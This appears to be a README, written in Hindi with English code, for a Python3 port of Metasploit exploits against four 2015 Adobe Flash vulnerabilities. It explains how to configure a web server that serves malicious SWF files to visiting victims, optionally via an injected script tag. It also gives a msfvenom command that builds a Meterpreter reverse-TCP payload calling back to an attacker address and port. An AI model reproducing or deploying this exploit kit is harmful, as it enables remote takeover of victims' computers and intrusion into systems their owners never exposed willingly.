
Adobe Flash की कमजोरियों CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit एक्सप्लॉइट्स को Python3 स्क्रिप्ट में परिवर्तित किया गया।
Adobe Flash भेद्यताओं CVE-2015-3090, CVE-2015-3105, CVE-2015-5119, और CVE-2015-5122 के लिए Metasploit exploits को Python3 स्क्रिप्ट में परिवर्तित किया गया।
यह स्क्रिप्ट एक वेब सर्वर होस्ट करेगी जो एक बार में निम्नलिखित Adobe Flash भेद्यताओं में से एक का शोषण कर सकती है:
आपको अपनी आवश्यकताओं के अनुसार exploit.py में परिवर्तन करने होंगे (यहाँ रूपरेखा)।
hostname = "192.168.1.100"
serverPort = 8080
xss = False
True पर सेट किया जाता है, तो पीड़ित का सर्वर पर पहला अनुरोध JavaScript के रूप में माना जाता है:
<script src="http://192.168.1.100:8080/"></script>False पर सेट किया जाता है, तो पीड़ित का सर्वर पर पहला अनुरोध HTML के रूप में माना जाता है:
http://192.168.1.100:8080/base64Payload = "..."
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 | base64ध्यान दें: एकमात्र पेलोड जो मेरे लिए काम करता है वह
windows/meterpreter/reverse_tcpहै।
swfFile = swfFileList['37368']
swfFileList = {
'37368': 'CVE-2015-3090.swf',
'37448': 'CVE-2015-3105.swf',
'37523': 'CVE-2015-5119.swf',
'37599': 'CVE-2015-5122.swf'
}
दुर्भावनापूर्ण swf फ़ाइलों के समान निर्देशिका में, Adobe Flash शोषण स्क्रिप्ट को निष्पादित करने के लिए निम्नलिखित कमांड चलाएँ:
python3 exploit.pyCVE-2015-3090 -> https://exploit-db.com/exploits/37368
CVE-2015-3105 -> https://exploit-db.com/exploits/37448
CVE-2015-5119 -> https://exploit-db.com/exploits/37523
CVE-2015-5122 -> https://exploit-db.com/exploits/37599